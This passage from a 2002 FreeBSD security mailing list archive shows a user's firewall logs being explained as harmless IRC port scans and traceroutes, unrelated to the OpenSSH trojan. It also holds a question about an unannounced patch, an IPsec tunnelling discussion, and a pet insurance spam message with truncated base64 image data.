----- End forwarded message ----- Here's a little more: ---8<--- Aug 2 12:18:18 sheol ipmon[70]: 12:18:17.917483 dc1 @1:13 b 217.162.144.117,33241 -> 208.42.101.192,33483 PR udp len 20 40 IN Aug 2 12:18:23 sheol ipmon[70]: 12:18:22.927437 dc1 @1:13 b 217.162.144.117,33241 -> 208.42.101.192,33484 PR udp len 20 40 IN Aug 2 12:18:59 sheol ipmon[70]: 12:18:58.568630 dc1 @1:13 b 217.162.144.117,33247 -> 208.42.101.193,33483 PR udp len 20 40 IN Aug 2 12:19:04 sheol ipmon[70]: 12:19:03.572959 dc1 @1:13 b 217.162.144.117,33247 -> 208.42.101.193,33484 PR udp len 20 40 IN Aug 2 12:19:10 sheol ipmon[70]: 12:19:10.310476 dc1 @1:13 b 217.162.144.117,1041 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:19:13 sheol ipmon[70]: 12:19:13.302950 dc1 @1:13 b 217.162.144.117,1041 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:19:17 sheol ipmon[70]: 12:19:16.673305 dc1 @1:13 b 217.162.144.117,1042 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:19:20 sheol ipmon[70]: 12:19:19.673198 dc1 @1:13 b 217.162.144.117,1042 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:19:23 sheol ipmon[70]: 12:19:22.672113 dc1 @1:13 b 217.162.144.117,1042 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:21:55 sheol ipmon[70]: 12:21:54.536656 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:21:58 sheol ipmon[70]: 12:21:57.538491 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:22:01 sheol ipmon[70]: 12:22:00.538145 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN Aug 2 12:22:04 sheol ipmon[70]: 12:22:03.537041 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:07 sheol ipmon[70]: 12:22:06.536146 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:10 sheol ipmon[70]: 12:22:09.537220 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:16 sheol ipmon[70]: 
12:22:15.534979 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:28 sheol ipmon[70]: 12:22:27.535148 dc1 @1:13 b 217.162.144.117,1043 -> 208.42.101.193,6667 PR tcp len 20 44 -S IN Aug 2 12:22:37 sheol ipmon[70]: 12:22:36.949576 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:22:40 sheol ipmon[70]: 12:22:39.945236 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:22:43 sheol ipmon[70]: 12:22:42.949236 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 60 -S IN Aug 2 12:22:46 sheol ipmon[70]: 12:22:45.943690 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN Aug 2 12:22:49 sheol ipmon[70]: 12:22:48.945132 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN Aug 2 12:22:52 sheol ipmon[70]: 12:22:51.946179 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN Aug 2 12:22:58 sheol ipmon[70]: 12:22:57.944014 dc1 @1:13 b 217.162.144.117,1044 -> 208.42.101.192,6667 PR tcp len 20 44 -S IN --->8--- But unlike the first, this address resolves: [sheol] ~$ nslookup 217.162.144.177 Server: sheol.localdomain Address: 192.168.16.2 Name: dclient217-162-144-177.hispeed.ch Address: 217.162.144.177 And also unlike the first, the host tried some UDP first. Are we certain no exploits are in the wild, as of now? I won't post further on this unless it generates some interest. Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. 
/ __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11: 7:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7E36937B405; Fri, 2 Aug 2002 11:07:14 -0700 (PDT) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 102CB43E70; Fri, 2 Aug 2002 11:07:14 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 4D5D9503E; Fri, 2 Aug 2002 13:07:13 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g72I7CB59150; Fri, 2 Aug 2002 13:07:12 -0500 (CDT) (envelope-from hawkeyd) Date: Fri, 2 Aug 2002 13:07:12 -0500 From: D J Hawkey Jr To: "Jacques A. Vidrine" , security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802130712.A59134@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20020802104836.A16486@sheol.localdomain> <20020802171914.GB50692@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020802171914.GB50692@madman.nectar.cc>; from nectar@freebsd.org on Fri, Aug 02, 2002 at 12:19:14PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Aug 02, at 12:19 PM, Jacques A. 
Vidrine wrote: > > On Fri, Aug 02, 2002 at 10:48:36AM -0500, D J Hawkey Jr wrote: > > Aug 2 10:27:15 sheol ipmon[70]: 10:27:15.792366 dc1 @1:13 b 216.196.144.24,1166 -> 208.42.101.192,6667 PR tcp len 20 48 -S IN > > This is someone port scanning you for IRC. (Your network > is 208.42.101.192/something.) It has nothing to do with > OpenSSL or OpenSSH (which is what I assume you really meant) or > 4.5-RELEASE-pWhatever or FreeBSD. Ohhh, IRC uses port 6667? It's not in /etc/services, and I didn't know this. > The trojan was never something incorporated into the FreeBSD base > system, and the port would report a checksum mismatch. You don't > really have anything to worry about unless you manually fetched and > installed the trojan'd ssh. All righty, then! Thanks, Jacques. > Cheers, > Jacques A. Vidrine http://www.nectar.cc/ Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11:16: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EC32F37B400 for ; Fri, 2 Aug 2002 11:15:57 -0700 (PDT) Received: from serv2.vsi.ru (serv2.vsi.ru [80.82.32.11]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7ECA143E5E for ; Fri, 2 Aug 2002 11:15:56 -0700 (PDT) (envelope-from oleg@vsi.ru) Received: (from nobody@localhost) by serv2.vsi.ru (8.9.3/8.9.3) id WAA28720 for freebsd-security@FreeBSD.ORG; Fri, 2 Aug 2002 22:15:48 +0400 (MSD) (envelope-from oleg@vsi.ru) To: freebsd-security@FreeBSD.ORG Subject: SA-02:35 Message-ID: <1028312148.3d4acc54c5eef@webmail.vsi.ru> Date: Fri, 02 Aug 2002 22:15:48 +0400 (MSD) From: Oleg Derevenetz MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r 
Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.8 X-Originating-IP: 80.82.32.19 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I recently visited ftp.freebsd.org, and found directory SA-02:35 in CERT/patches without corresponding advisory in CERT/advisories. Does anyone know something about this SA ? As I understand, it belongs to ffs subsystem. Is it recommended ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11:30:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1E8F637B405 for ; Fri, 2 Aug 2002 11:30:35 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 90C9E43E3B for ; Fri, 2 Aug 2002 11:30:34 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 0BACB10; Fri, 2 Aug 2002 13:30:34 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g72IUXU4018816; Fri, 2 Aug 2002 13:30:33 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g72IUX5N018815; Fri, 2 Aug 2002 13:30:33 -0500 (CDT) Date: Fri, 2 Aug 2002 13:30:33 -0500 From: "Jacques A. Vidrine" To: D J Hawkey Jr Cc: security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802183033.GA18787@madman.nectar.cc> Mail-Followup-To: "Jacques A. 
Vidrine" , D J Hawkey Jr , security at FreeBSD References: <20020802122851.A55094@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020802122851.A55094@sheol.localdomain> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 12:28:51PM -0500, D J Hawkey Jr wrote: > Aug 2 12:19:04 sheol ipmon[70]: 12:19:03.572959 dc1 @1:13 b 217.162.144.117,33247 -> 208.42.101.193,33484 PR udp len 20 40 IN > Aug 2 12:19:10 sheol ipmon[70]: 12:19:10.310476 dc1 @1:13 b 217.162.144.117,1041 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN As in your previous message, these are packets that are coming INTO your system and are being dropped. High UDP ports like 33484 are indicative of traceroute. > But unlike the first, this address resolves: > > [sheol] ~$ nslookup 217.162.144.177 > Server: sheol.localdomain > Address: 192.168.16.2 > > Name: dclient217-162-144-177.hispeed.ch > Address: 217.162.144.177 > > And also unlike the first, the host tried some UDP first. > > Are we certain no exploits are in the wild, as of now? You can never be certain. There are none known though. > I won't post further on this unless it generates some interest. Yes, please don't. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11:33:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 489C337B401 for ; Fri, 2 Aug 2002 11:33:27 -0700 (PDT) Received: from carbon.berkeley.netdot.net (carbon.berkeley.netdot.net [216.27.190.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id A71D743E84 for ; Fri, 2 Aug 2002 11:33:26 -0700 (PDT) (envelope-from nick@netdot.net) Received: by carbon.berkeley.netdot.net (Postfix, from userid 101) id 4C410F84B; Fri, 2 Aug 2002 11:33:26 -0700 (PDT) Date: Fri, 2 Aug 2002 11:33:26 -0700 From: Nicholas Esborn To: Mailing List FreeBSD Security Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...] Message-ID: <20020802183326.GA52336@carbon.berkeley.netdot.net> References: <20020730074813.GF89241@blossom.cjclark.org> <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com> <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com> <20020802172729.GA6880@blossom.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020802172729.GA6880@blossom.cjclark.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 10:27:29AM -0700, Crist J. Clark wrote: > On Fri, Aug 02, 2002 at 02:56:39PM +0200, Eric Masson wrote: > > With only one tunnel configured, netstat -rn on the security gateway > > doesn't show any routes to the remote networks nor host. > > > > With a second tunnel added, are there any additionnal configuration > > steps or will the kernel do the routing automagically ? 
> > It's pretty much automagically done by way of the SPD entry. Any > packet that matches the source and destination in the SPD gets put > through the appropriate tunnel with the specified end points. It's not > the same as the regular routing table and will not show up in 'netstat > -rn.' I ended up using AH and ESP in transport mode between gateways, then using gif tunnels to encapsulate traffic to other networks. I wanted to be able to use the routing table. I never liked tunnel mode IPsec's "magic portal" approach. > -- > Crist J. Clark | cjclark@alum.mit.edu > | cjclark@jhu.edu > http://people.freebsd.org/~cjc/ | cjc@freebsd.org -nick -- Nicholas Esborn Unix Systems Administrator Berkeley, California To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 12:50:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F200837B400; Fri, 2 Aug 2002 12:39:52 -0700 (PDT) Received: from host23.websitesource.com (host23.websitesource.com [209.239.41.222]) by mx1.FreeBSD.org (Postfix) with ESMTP id CB09A43E5E; Fri, 2 Aug 2002 12:39:45 -0700 (PDT) (envelope-from app-request@americanpetplan.com) Received: (from app-1@localhost) by host23.websitesource.com (8.10.2/8.10.2) id g72JCgF04622; Fri, 2 Aug 2002 15:12:42 -0400 X-Authentication-Warning: host23.websitesource.com: app-1 set sender to app-request@americanpetplan.com using -f Message-ID: <000501c23a57$ee694f80$c5031942@WEBSITES> From: "www.americanpetplan.com" To: Subject: Pet Health Plan! 
Date: Fri, 2 Aug 2002 14:08:00 -0500
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0001_01C23A2E.0244DFD0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailing-List: archive/latest/5
X-Loop: app@americanpetplan.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

This offer is brought to you by the American Pet Plan.com. If you no longer wish to receive offers in the future, please unsubscribe below. If you cannot view this email, please click here: www.americanpetplan.com

1992 Celebrating 10 years of Excellence! 2002

The American Pet Plan can save you hundreds or even thousands of dollars per year on all your veterinary health care costs! All at very affordable rates!!

Veterinarian Recommended! Benefits Include:
$5.00 Doctor Visits!
$10.00 Comprehensive Medical Exams!
Lowest Cost In-Office Vaccinations!
Benefits on All other Veterinary Care & Rx's!
Benefits on Grooming & Boarding!
Benefits on Pet Sitting & Dog Training!
Immediate Benefits on Pre-existing Conditions!
All Animals Accepted!
No Age Limits!
Extremely Affordable!
And So Much More!
VISIT US NOW AT WWW.AMERICANPETPLAN.COM !

------------------------------------------------------------------------

This message is never sent unsolicited. You are receiving this message as a member of the American Pet Plan.com or one of our advertising affiliates. If you do not want to receive special offers in the future, please click here: app-request@americanpetplan.com and type in UNSUBSCRIBE in the subject line. You will be immediately removed.
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 